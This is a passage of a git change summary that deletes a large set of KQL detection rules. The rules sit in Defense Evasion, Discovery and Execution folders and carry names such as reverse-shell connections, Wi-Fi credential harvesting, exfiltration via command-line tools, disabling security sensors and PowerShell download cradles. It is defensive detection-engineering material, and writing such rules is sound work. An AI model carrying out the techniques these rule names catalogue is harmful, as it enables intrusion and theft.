Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql delete mode 100644 Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql delete mode 100644 Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql delete mode 100644 Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql delete mode 100644 Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql delete mode 100644 Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql delete mode 100644 Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql delete mode 100644 Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql delete mode 100644 Defense Evasion/Uncommon_Svchost_Parent_Process.kql delete mode 100644 Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql delete 
mode 100644 Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql delete mode 100644 Defense Evasion/Uninstall_Sysinternals_Sysmon.kql delete mode 100644 Defense Evasion/Unmount_Share_Via_Net.EXE.kql delete mode 100644 Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql delete mode 100644 Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql delete mode 100644 Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql delete mode 100644 Defense Evasion/Use_NTFS_Short_Name_in_Image.kql delete mode 100644 Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql delete mode 100644 Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql delete mode 100644 Defense Evasion/Use_Short_Name_Path_in_Image.kql delete mode 100644 Defense Evasion/Use_of_Remote.exe.kql delete mode 100644 Defense Evasion/Use_of_Scriptrunner.exe.kql delete mode 100644 Defense Evasion/Use_of_Setres.exe.kql delete mode 100644 Defense Evasion/Use_of_TTDInject.exe.kql delete mode 100644 Defense Evasion/Use_of_VSIISExeLauncher.exe.kql delete mode 100644 Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql delete mode 100644 Defense Evasion/Use_of_Wfc.exe.kql delete mode 100644 Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql delete mode 100644 Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql delete mode 100644 Defense Evasion/Verclsid.exe_Runs_COM_Object.kql delete mode 100644 Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql delete mode 100644 Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql delete mode 100644 Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql delete mode 100644 Defense Evasion/WMIC_Loading_Scripting_Libraries.kql delete mode 100644 Defense Evasion/WSL_Child_Process_Anomaly.kql delete mode 100644 Defense Evasion/Wab_Execution_From_Non_Default_Location.kql delete mode 100644 Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql delete mode 100644 Defense 
Evasion/Wdigest_Enable_UseLogonCredential.kql delete mode 100644 Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql delete mode 100644 Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql delete mode 100644 Defense Evasion/Windows_Defender_Definition_Files_Removed.kql delete mode 100644 Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql delete mode 100644 Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql delete mode 100644 Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql delete mode 100644 Defense Evasion/Windows_Kernel_Debugger_Execution.kql delete mode 100644 Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql delete mode 100644 Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql delete mode 100644 Defense Evasion/Winget_Admin_Settings_Modification.kql delete mode 100644 Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql delete mode 100644 Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql delete mode 100644 Defense Evasion/Write_Protect_For_Storage_Disabled.kql delete mode 100644 Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql delete mode 100644 Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql delete mode 100644 Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql delete mode 100644 Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql delete mode 100644 Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql delete mode 100644 Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql delete mode 100644 Discovery/Advanced_IP_Scanner_-_File_Event.kql delete mode 100644 Discovery/BloodHound_Collection_Files.kql delete mode 100644 Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql delete mode 100644 Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Discovery/Console_CodePage_Lookup_Via_CHCP.kql delete mode 100644 
Discovery/Detected_Windows_Software_Discovery.kql delete mode 100644 Discovery/DirLister_Execution.kql delete mode 100644 Discovery/Discovery_of_a_System_Time.kql delete mode 100644 Discovery/Domain_Trust_Discovery_Via_Dsquery.kql delete mode 100644 Discovery/DriverQuery.EXE_Execution.kql delete mode 100644 Discovery/Enumerate_All_Information_With_Whoami.EXE.kql delete mode 100644 Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql delete mode 100644 Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql delete mode 100644 Discovery/Fsutil_Drive_Enumeration.kql delete mode 100644 Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql delete mode 100644 Discovery/Gpresult_Display_Group_Policy_Information.kql delete mode 100644 Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql delete mode 100644 Discovery/HackTool_-_Certify_Execution.kql delete mode 100644 Discovery/HackTool_-_Certipy_Execution.kql delete mode 100644 Discovery/HackTool_-_CrackMapExec_Execution.kql delete mode 100644 Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql delete mode 100644 Discovery/HackTool_-_SharpLdapWhoami_Execution.kql delete mode 100644 Discovery/HackTool_-_SharpView_Execution.kql delete mode 100644 Discovery/HackTool_-_TruffleSnout_Execution.kql delete mode 100644 Discovery/HackTool_-_WinPwn_Execution.kql delete mode 100644 Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql delete mode 100644 Discovery/Local_Accounts_Discovery.kql delete mode 100644 Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql delete mode 100644 Discovery/Network_Reconnaissance_Activity.kql delete mode 100644 Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql delete mode 100644 Discovery/Nltest.EXE_Execution.kql delete mode 100644 Discovery/Obfuscated_IP_Download_Activity.kql delete mode 100644 Discovery/Obfuscated_IP_Via_CLI.kql delete mode 100644 
Discovery/PUA_-_AdFind_Suspicious_Execution.kql delete mode 100644 Discovery/PUA_-_Adidnsdump_Execution.kql delete mode 100644 Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql delete mode 100644 Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql delete mode 100644 Discovery/PUA_-_Crassus_Execution.kql delete mode 100644 Discovery/PUA_-_Seatbelt_Execution.kql delete mode 100644 Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql delete mode 100644 Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql delete mode 100644 Discovery/Permission_Check_Via_Accesschk.EXE.kql delete mode 100644 Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql delete mode 100644 Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql delete mode 100644 Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql delete mode 100644 Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql delete mode 100644 Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql delete mode 100644 Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql delete mode 100644 Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql delete mode 100644 Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql delete mode 100644 Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql delete mode 100644 Discovery/Python_Initiated_Connection.kql delete mode 100644 Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql delete mode 100644 Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql delete mode 100644 Discovery/Renamed_Whoami_Execution.kql delete mode 100644 Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql delete mode 100644 Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql delete mode 100644 Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql delete mode 100644 Discovery/Suspicious_Execution_of_Hostname.kql delete mode 100644 
Discovery/Suspicious_Execution_of_Systeminfo.kql delete mode 100644 Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql delete mode 100644 Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql delete mode 100644 Discovery/Suspicious_Network_Command.kql delete mode 100644 Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql delete mode 100644 Discovery/Suspicious_Query_of_MachineGUID.kql delete mode 100644 Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql delete mode 100644 Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql delete mode 100644 Discovery/Suspicious_Scan_Loop_Network.kql delete mode 100644 Discovery/Suspicious_Use_of_PsLogList.kql delete mode 100644 Discovery/Suspicious_Where_Execution.kql delete mode 100644 Discovery/Sysinternals_PsService_Execution.kql delete mode 100644 Discovery/Sysinternals_PsSuspend_Execution.kql delete mode 100644 Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql delete mode 100644 Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql delete mode 100644 Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql delete mode 100644 Discovery/Use_of_W32tm_as_Timer.kql delete mode 100644 Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql delete mode 100644 Discovery/WhoAmI_as_Parameter.kql delete mode 100644 Discovery/Whoami.EXE_Execution_Anomaly.kql delete mode 100644 Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql delete mode 100644 Discovery/Whoami.EXE_Execution_With_Output_Option.kql delete mode 100644 Discovery/Whoami_Utility_Execution.kql delete mode 100644 Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql delete mode 100644 Execution/Abusable_DLL_Potential_Sideloading_From_Suspicious_Location.kql delete mode 100644 
Execution/Active_Directory_Kerberos_DLL_Loaded_Via_Office_Application.kql delete mode 100644 Execution/Active_Directory_Parsing_DLL_Loaded_Via_Office_Application.kql delete mode 100644 Execution/Add_Insecure_Download_Source_To_Winget.kql delete mode 100644 Execution/Add_New_Download_Source_To_Winget.kql delete mode 100644 Execution/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql delete mode 100644 Execution/Add_Windows_Capability_Via_PowerShell_Cmdlet.kql delete mode 100644 Execution/Application_Removed_Via_Wmic.EXE.kql delete mode 100644 Execution/Application_Terminated_Via_Wmic.EXE.kql delete mode 100644 Execution/Arbitrary_Binary_Execution_Using_GUP_Utility.kql delete mode 100644 Execution/Arbitrary_Command_Execution_Using_WSL.kql delete mode 100644 Execution/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql delete mode 100644 Execution/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql delete mode 100644 Execution/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql delete mode 100644 Execution/Arbitrary_File_Download_Via_MSPUB.EXE.kql delete mode 100644 Execution/Arbitrary_File_Download_Via_PresentationHost.EXE.kql delete mode 100644 Execution/Arbitrary_File_Download_Via_Squirrel.EXE.kql delete mode 100644 Execution/Arbitrary_MSI_Download_Via_Devinit.EXE.kql delete mode 100644 Execution/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql delete mode 100644 Execution/Assembly_DLL_Creation_Via_AspNetCompiler.kql delete mode 100644 Execution/Base64_MZ_Header_In_CommandLine.kql delete mode 100644 Execution/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql delete mode 100644 Execution/BloodHound_Collection_Files.kql delete mode 100644 Execution/Blue_Mockingbird_-_Registry.kql delete mode 100644 Execution/CLR_DLL_Loaded_Via_Office_Applications.kql delete mode 100644 Execution/CMSTP_Execution_Process_Creation.kql delete mode 100644 Execution/CMSTP_Execution_Registry_Event.kql delete mode 100644 Execution/CMSTP_UAC_Bypass_via_COM_Object_Access.kql delete mode 100644 
Execution/CSExec_Service_File_Creation.kql delete mode 100644 Execution/Certificate_Exported_Via_PowerShell.kql delete mode 100644 Execution/Change_PowerShell_Policies_to_an_Insecure_Level.kql delete mode 100644 Execution/Chromium_Browser_Headless_Execution_To_Mockbin_Like_Site.kql delete mode 100644 Execution/Cmd.EXE_Missing_Space_Characters_Execution_Anomaly.kql delete mode 100644 Execution/Command_Line_Execution_with_Suspicious_URL_and_AppData_Strings.kql delete mode 100644 Execution/Computer_Password_Change_Via_Ksetup.EXE.kql delete mode 100644 Execution/Computer_System_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Conhost.exe_CommandLine_Path_Traversal.kql delete mode 100644 Execution/Conhost_Spawned_By_Uncommon_Parent_Process.kql delete mode 100644 Execution/Control_Panel_Items.kql delete mode 100644 Execution/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql delete mode 100644 Execution/Created_Files_by_Microsoft_Sync_Center.kql delete mode 100644 Execution/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql delete mode 100644 Execution/Curl_Web_Request_With_Potential_Custom_User-Agent.kql delete mode 100644 Execution/DLL_Load_via_LSASS.kql delete mode 100644 Execution/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql delete mode 100644 Execution/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql delete mode 100644 Execution/DotNET_Assembly_DLL_Loaded_Via_Office_Application.kql delete mode 100644 Execution/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql delete mode 100644 Execution/Enable_Microsoft_Dynamic_Data_Exchange.kql delete mode 100644 Execution/Exchange_PowerShell_Snap-Ins_Usage.kql delete mode 100644 Execution/Execute_Code_with_Pester.bat.kql delete mode 100644 Execution/Execute_Code_with_Pester.bat_as_Parent.kql delete mode 100644 Execution/Execute_MSDT_Via_Answer_File.kql delete mode 100644 Execution/Execute_Pcwrun.EXE_To_Leverage_Follina.kql delete mode 100644 
Execution/Execution_of_Powershell_Script_in_Public_Folder.kql delete mode 100644 Execution/File_Decryption_Using_Gpg4win.kql delete mode 100644 Execution/File_Download_From_IP_Based_URL_Via_CertOC.EXE.kql delete mode 100644 Execution/File_Download_From_IP_URL_Via_Curl.EXE.kql delete mode 100644 Execution/File_Encryption_Using_Gpg4win.kql delete mode 100644 Execution/File_With_Uncommon_Extension_Created_By_An_Office_Application.kql delete mode 100644 Execution/Forfiles_Command_Execution.kql delete mode 100644 Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql delete mode 100644 Execution/GAC_DLL_Loaded_Via_Office_Applications.kql delete mode 100644 Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql delete mode 100644 Execution/HackTool_-_Covenant_PowerShell_Launcher.kql delete mode 100644 Execution/HackTool_-_CrackMapExec_Execution.kql delete mode 100644 Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql delete mode 100644 Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql delete mode 100644 Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql delete mode 100644 Execution/HackTool_-_Impacket_Tools_Execution.kql delete mode 100644 Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql delete mode 100644 Execution/HackTool_-_Koadic_Execution.kql delete mode 100644 Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql delete mode 100644 Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql delete mode 100644 Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql delete mode 100644 Execution/HackTool_-_Stracciatella_Execution.kql delete mode 100644 Execution/HackTool_-_WinPwn_Execution.kql delete mode 100644 Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Hidden_Powershell_in_Link_File_Pattern.kql delete mode 100644 Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql delete mode 100644 
Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql delete mode 100644 Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql delete mode 100644 Execution/Insecure_Transfer_Via_Curl.EXE.kql delete mode 100644 Execution/Install_New_Package_Via_Winget_Local_Manifest.kql delete mode 100644 Execution/Invoke-Obfuscation_CLIP+_Launcher.kql delete mode 100644 Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql delete mode 100644 Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql delete mode 100644 Execution/Invoke-Obfuscation_STDIN+_Launcher.kql delete mode 100644 Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql delete mode 100644 Execution/Invoke-Obfuscation_VAR+_Launcher.kql delete mode 100644 Execution/Invoke-Obfuscation_Via_Stdin.kql delete mode 100644 Execution/Invoke-Obfuscation_Via_Use_Clip.kql delete mode 100644 Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql delete mode 100644 Execution/Java_Running_with_Remote_Debugging.kql delete mode 100644 Execution/Local_File_Read_Using_Curl.EXE.kql delete mode 100644 Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql delete mode 100644 Execution/MMC20_Lateral_Movement.kql delete mode 100644 Execution/MSHTA_Suspicious_Execution_01.kql delete mode 100644 Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql delete mode 100644 Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql delete mode 100644 Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql delete mode 100644 Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql delete mode 100644 Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql delete mode 100644 Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql delete mode 100644 Execution/Microsoft_Workflow_Compiler_Execution.kql delete mode 100644 Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql delete mode 100644 Execution/Net_WebClient_Casing_Anomalies.kql 
delete mode 100644 Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql delete mode 100644 Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql delete mode 100644 Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql delete mode 100644 Execution/New_Application_in_AppCompat.kql delete mode 100644 Execution/New_Process_Created_Via_Wmic.EXE.kql delete mode 100644 Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql delete mode 100644 Execution/Non_Interactive_PowerShell_Process_Spawned.kql delete mode 100644 Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql delete mode 100644 Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql delete mode 100644 Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql delete mode 100644 Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql delete mode 100644 Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql delete mode 100644 Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql delete mode 100644 Execution/PCRE.NET_Package_Image_Load.kql delete mode 100644 Execution/PCRE.NET_Package_Temp_Files.kql delete mode 100644 Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql delete mode 100644 Execution/PSEXEC_Remote_Execution_File_Artefact.kql delete mode 100644 Execution/PUA_-_AdvancedRun_Execution.kql delete mode 100644 Execution/PUA_-_CsExec_Execution.kql delete mode 100644 Execution/PUA_-_NSudo_Execution.kql delete mode 100644 Execution/PUA_-_NirCmd_Execution.kql delete mode 100644 Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql delete mode 100644 Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql delete mode 100644 Execution/PUA_-_RunXCmd_Execution.kql delete mode 100644 Execution/PUA_-_Wsudo_Suspicious_Execution.kql delete mode 100644 Execution/Parent_in_Public_Folder_Suspicious_Process.kql delete mode 100644 Execution/Perl_Inline_Command_Execution.kql delete mode 100644 Execution/Php_Inline_Command_Execution.kql 
delete mode 100644 Execution/Potential_Adplus.EXE_Abuse.kql delete mode 100644 Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql delete mode 100644 Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql delete mode 100644 Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql delete mode 100644 Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql delete mode 100644 Execution/Potential_CobaltStrike_Process_Patterns.kql delete mode 100644 Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql delete mode 100644 Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql delete mode 100644 Execution/Potential_Cookies_Session_Hijacking.kql delete mode 100644 Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql delete mode 100644 Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql delete mode 100644 Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql delete mode 100644 Execution/Potential_Dosfuscation_Activity.kql delete mode 100644 Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql delete mode 100644 Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql delete mode 100644 Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql delete mode 100644 Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql delete mode 100644 Execution/Potential_PowerShell_Command_Line_Obfuscation.kql delete mode 100644 Execution/Potential_PowerShell_Downgrade_Attack.kql delete mode 100644 Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql delete mode 100644 Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql delete mode 100644 Execution/Potential_Powershell_ReverseShell_Connection.kql delete mode 100644 Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 
Execution/Potential_RDP_Session_Hijacking_Activity.kql delete mode 100644 Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql delete mode 100644 Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql delete mode 100644 Execution/Potential_Renamed_Rundll32_Execution.kql delete mode 100644 Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql delete mode 100644 Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql delete mode 100644 Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql delete mode 100644 Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql delete mode 100644 Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql delete mode 100644 Execution/Potential_WinAPI_Calls_Via_CommandLine.kql delete mode 100644 Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql delete mode 100644 Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql delete mode 100644 Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql delete mode 100644 Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql delete mode 100644 Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql delete mode 100644 Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql delete mode 100644 Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql delete mode 100644 Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql delete mode 100644 Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql delete mode 100644 Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql delete mode 100644 Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql delete mode 100644 Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql delete mode 100644 
Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql delete mode 100644 Execution/PowerShell_Base64_Encoded_WMI_Classes.kql delete mode 100644 Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql delete mode 100644 Execution/PowerShell_DownloadFile.kql delete mode 100644 Execution/PowerShell_Download_Pattern.kql delete mode 100644 Execution/PowerShell_Download_and_Execution_Cradles.kql delete mode 100644 Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql delete mode 100644 Execution/PowerShell_Script_Execution_Policy_Enabled.kql delete mode 100644 Execution/PowerShell_Script_Run_in_AppData.kql delete mode 100644 Execution/PowerShell_Web_Download.kql delete mode 100644 Execution/PowerShell_as_a_Service_in_Registry.kql delete mode 100644 Execution/Powershell_Inline_Execution_From_A_File.kql delete mode 100644 Execution/PrinterNightmare_Mimikatz_Driver_Name.kql delete mode 100644 Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql delete mode 100644 Execution/Process_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Proxy_Execution_Via_Wuauclt.EXE.kql delete mode 100644 Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql delete mode 100644 Execution/PsExec_Service_Execution.kql delete mode 100644 Execution/PsExec_Service_File_Creation.kql delete mode 100644 Execution/Psexec_Execution.kql delete mode 100644 Execution/Python_Inline_Command_Execution.kql delete mode 100644 Execution/Python_Spawning_Pretty_TTY_on_Windows.kql delete mode 100644 Execution/Query_Usage_To_Exfil_Data.kql delete mode 100644 Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql delete mode 100644 Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql delete mode 100644 Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql delete mode 100644 Execution/RemCom_Service_File_Creation.kql delete mode 100644 Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql delete mode 
100644 Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql delete mode 100644 Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql delete mode 100644 Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql delete mode 100644 Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql delete mode 100644 Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql delete mode 100644 Execution/Renamed_CURL.EXE_Execution.kql delete mode 100644 Execution/Renamed_FTP.EXE_Execution.kql delete mode 100644 Execution/Renamed_Jusched.EXE_Execution.kql delete mode 100644 Execution/Renamed_NirCmd.EXE_Execution.kql delete mode 100644 Execution/Renamed_PingCastle_Binary_Execution.kql delete mode 100644 Execution/Renamed_PsExec_Service_Execution.kql delete mode 100644 Execution/Ruby_Inline_Command_Execution.kql delete mode 100644 Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql delete mode 100644 Execution/Rundll32_Execution_Without_Parameters.kql delete mode 100644 Execution/Rundll32_Internet_Connection.kql delete mode 100644 Execution/Rundll32_UNC_Path_Execution.kql delete mode 100644 Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql delete mode 100644 Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql delete mode 100644 Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql delete mode 100644 Execution/Scheduled_Task_Executing_Payload_from_Registry.kql delete mode 100644 Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql delete mode 100644 Execution/Schtasks_From_Suspicious_Folders.kql delete mode 100644 Execution/Script_Event_Consumer_Spawning_Process.kql delete mode 100644 Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql delete mode 100644 Execution/Service_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql delete mode 100644 Execution/Service_StartupType_Change_Via_Sc.EXE.kql delete mode 100644 
